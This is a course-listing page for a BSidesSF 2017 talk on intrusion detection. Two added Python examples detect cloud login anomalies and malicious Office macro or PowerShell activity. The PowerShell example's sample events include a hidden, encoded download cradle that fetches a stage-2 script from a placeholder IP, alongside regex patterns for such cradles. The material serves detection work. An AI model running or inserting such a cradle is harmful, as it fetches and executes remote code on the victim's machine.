YoVDO

Building an Effective Intrusion Detection Program

Offered By: Security BSides San Francisco via YouTube

Tags

Security BSides Courses
Cloud Security Courses
Intrusion Detection Courses
Endpoint Security Courses
Windows Security Courses
Network Security Monitoring Courses

Course Description

Overview

Explore effective intrusion detection strategies in this BSidesSF 2017 conference talk. Learn how to build a robust detection program from affordable or free tools, covering cloud applications, endpoints, and network security monitoring. The talk compares recent high-profile incidents, many of which went undetected for months, and shows how each could have been caught earlier. It covers logging practice (the short version: log everything), Network Security Monitoring (NSM), and platform-specific tooling for Mac and Windows. Worked examples include cloud login logs from Google and Dropbox, detecting Windows Office macro implants and malicious PowerShell, hunting Mac implants with osquery and Santa, and network monitoring with Bro (now Zeek). The talk closes with crowd-sourced incident response techniques you can apply to your own organization.
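As an added illustration of the cloud-login examples the overview mentions (this is not the speaker's code and not a query from the talk): the logic below runs over a handful of constructed Dropbox/Google-style login records. The record fields, the baseline cut-off, and the three rules (first login from a country the user has never used, two countries within an hour, and one source IP failing against several distinct accounts) are assumptions chosen for this example, not rules the talk is known to present.

```python
"""Added example, not the talk's code: three baseline rules over cloud login
logs of the kind the talk discusses (Google, Dropbox). Record shape and the
sample records below are constructed for this example."""
from collections import defaultdict
from datetime import datetime, timedelta


def parse_ts(s):
    """Parse the ISO-8601 UTC timestamps used in the sample records."""
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def detect_login_anomalies(logins, baseline_until,
                           travel_window=timedelta(hours=1), spray_users=3):
    """Return findings as (subject, ts, rule) tuples; subject is the user for the
    per-account rules and the source IP for the spray rule.

    Successful logins before `baseline_until` only build each user's known-country
    set; everything at or after it is judged against that baseline."""
    cutoff = parse_ts(baseline_until)
    known = defaultdict(set)         # user -> countries seen so far
    last = {}                        # user -> (time, country) of previous success
    failed_users = defaultdict(set)  # source ip -> distinct users it failed against
    findings = []
    for e in sorted(logins, key=lambda r: parse_ts(r["ts"])):
        t, u, c = parse_ts(e["ts"]), e["user"], e["country"]
        if e["result"] != "success":
            # Password-spray rule: one IP failing against `spray_users` accounts.
            if t >= cutoff:
                failed_users[e["ip"]].add(u)
                if len(failed_users[e["ip"]]) == spray_users:
                    findings.append((e["ip"], e["ts"],
                                     f"password-spray:{spray_users} users"))
            continue
        if t >= cutoff:
            # New-country rule: user has never logged in from this country.
            if c not in known[u]:
                findings.append((u, e["ts"], "new-country:" + c))
            # Rapid-travel rule: different country than the previous login,
            # within a window too short to have travelled.
            if u in last and last[u][1] != c and t - last[u][0] <= travel_window:
                findings.append((u, e["ts"], f"rapid-travel:{last[u][1]}->{c}"))
        known[u].add(c)
        last[u] = (t, c)
    return findings


# Constructed sample records (not real Dropbox or Google data); IPs are from
# the documentation ranges. Deliberately out of order to show the sort matters.
SAMPLE_LOGINS = [
    {"ts": "2017-02-03T17:40:00Z", "user": "alice@example.com", "ip": "203.0.113.10", "country": "US", "result": "success"},
    {"ts": "2017-02-01T09:02:00Z", "user": "alice@example.com", "ip": "203.0.113.10", "country": "US", "result": "success"},
    {"ts": "2017-02-02T08:15:00Z", "user": "bob@example.com", "ip": "198.51.100.23", "country": "DE", "result": "success"},
    {"ts": "2017-02-12T10:00:00Z", "user": "alice@example.com", "ip": "203.0.113.10", "country": "US", "result": "success"},
    {"ts": "2017-02-12T10:35:00Z", "user": "alice@example.com", "ip": "192.0.2.77", "country": "RO", "result": "success"},
    {"ts": "2017-02-13T08:00:00Z", "user": "bob@example.com", "ip": "198.51.100.23", "country": "DE", "result": "success"},
    {"ts": "2017-02-14T03:00:00Z", "user": "bob@example.com", "ip": "192.0.2.77", "country": "FR", "result": "success"},
    {"ts": "2017-02-15T02:00:00Z", "user": "alice@example.com", "ip": "192.0.2.77", "country": "RO", "result": "failure"},
    {"ts": "2017-02-15T02:00:20Z", "user": "bob@example.com", "ip": "192.0.2.77", "country": "RO", "result": "failure"},
    {"ts": "2017-02-15T02:00:40Z", "user": "carol@example.com", "ip": "192.0.2.77", "country": "RO", "result": "failure"},
]

if __name__ == "__main__":
    for subject, ts, rule in detect_login_anomalies(SAMPLE_LOGINS, "2017-02-10T00:00:00Z"):
        print(ts, subject, rule)
```

The baseline cut-off is the simplest way to avoid alerting on every country a user already visits; in practice you would keep that set in a store that survives between runs and let analysts mark a flagged country as legitimate, which is exactly the "log everything first" loop the talk advocates.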

Syllabus

Intro
Assumptions
Social stuff: Be nice.
Tool talk: Logging
Re: Logging: Log everything
Tool talk: NSM
Tool talk: Macs
Tool talk: Windows
Examples: Cloud logging, Google logins
Examples: Cloud logging, Dropbox logins (example query)
Dropbox logins cont.
Examples: Windows Office macro implants
Skip a few steps...
End result
Examples: Windows PowerShell
Windows PowerShell cont.
Examples: Mac implants w/osquery
Mac & osquery cont. (edited for readability)
Examples: Mac implants w/Santa
Examples: Network monitoring: Bro FTW
Q&A: Questions? Comments?
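Added example for the Windows Office macro and PowerShell items in the syllabus (this is not the speaker's code and not the detection logic from the talk): two checks run over constructed Sysmon-style process-creation events. The field names (Image, ParentImage, CommandLine), the process lists, the command-line patterns and the sample events are assumptions made for this example.

```python
"""Added example, not the talk's code: detection logic for an Office macro
spawning a shell or script host, and for PowerShell command lines that look
like a dropper or download cradle. Events are constructed, Sysmon-style
process-creation records; field names are an assumption."""
import base64
import re

# Office hosts that should essentially never spawn a shell or script engine.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_CHILDREN = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                   "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# -EncodedCommand (and its -e / -enc abbreviations) followed by a base64 blob.
ENC_RE = r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})"

# Command-line traits typical of macro droppers; each is a case-insensitive regex.
SUSPICIOUS_PS = {
    "encoded": ENC_RE,
    "noprofile": r"-nop(?:rofile)?\b",
    "hidden": r"-w(?:indowstyle)?\s+hidden",
    "download": r"downloadstring|downloadfile|invoke-webrequest|net\.webclient",
    "iex": r"\biex\b|invoke-expression",
    "b64": r"frombase64string",
}


def _basename(path):
    """Lower-cased file name of a Windows (or Unix) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = re.search(ENC_RE, cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(ev):
    """Return a list of finding tags for one process-creation event ([] = clean)."""
    findings = []
    parent = _basename(ev.get("ParentImage", ""))
    child = _basename(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "")
    if parent in OFFICE_PARENTS and child in SCRIPT_CHILDREN:
        findings.append(f"office-spawn:{parent}->{child}")
    if child in ("powershell.exe", "pwsh.exe"):
        text = cmd
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            text = cmd + "\n" + decoded  # inspect the decoded payload as well
        for tag, pattern in SUSPICIOUS_PS.items():
            if re.search(pattern, text, re.I):
                findings.append("powershell:" + tag)
    return findings


def analyze_events(events):
    """Return {index: findings} for every event that produced at least one finding."""
    return {i: f for i, f in ((i, analyze_event(e)) for i, e in enumerate(events)) if f}


def _enc(script):
    """Build an -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (not real telemetry); the stage-2 host is a TEST-NET address.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage2.ps1')"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + _enc(PAYLOAD)},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
]

if __name__ == "__main__":
    for i, f in analyze_events(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i]["CommandLine"][:60], f)
```

The parent/child rule catches the macro the moment it runs regardless of what it launches; the PowerShell rules catch the same implant if it is launched some other way, and decoding the -EncodedCommand blob lets the download cradle be matched even though it never appears in clear text on the command line.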


Taught by

Security BSides San Francisco

Related Courses

Network Security Monitoring (NSM) with Security Onion
Pluralsight
Suricata: Getting Started
Pluralsight
Network Security Monitoring with Suricata
Pluralsight
Sweet Security - Deploying a Defensive Raspberry Pi
Security BSides San Francisco via YouTube
Peel Back the Layers of Your Enterprise and Make Your Adversaries Cry
RSA Conference via YouTube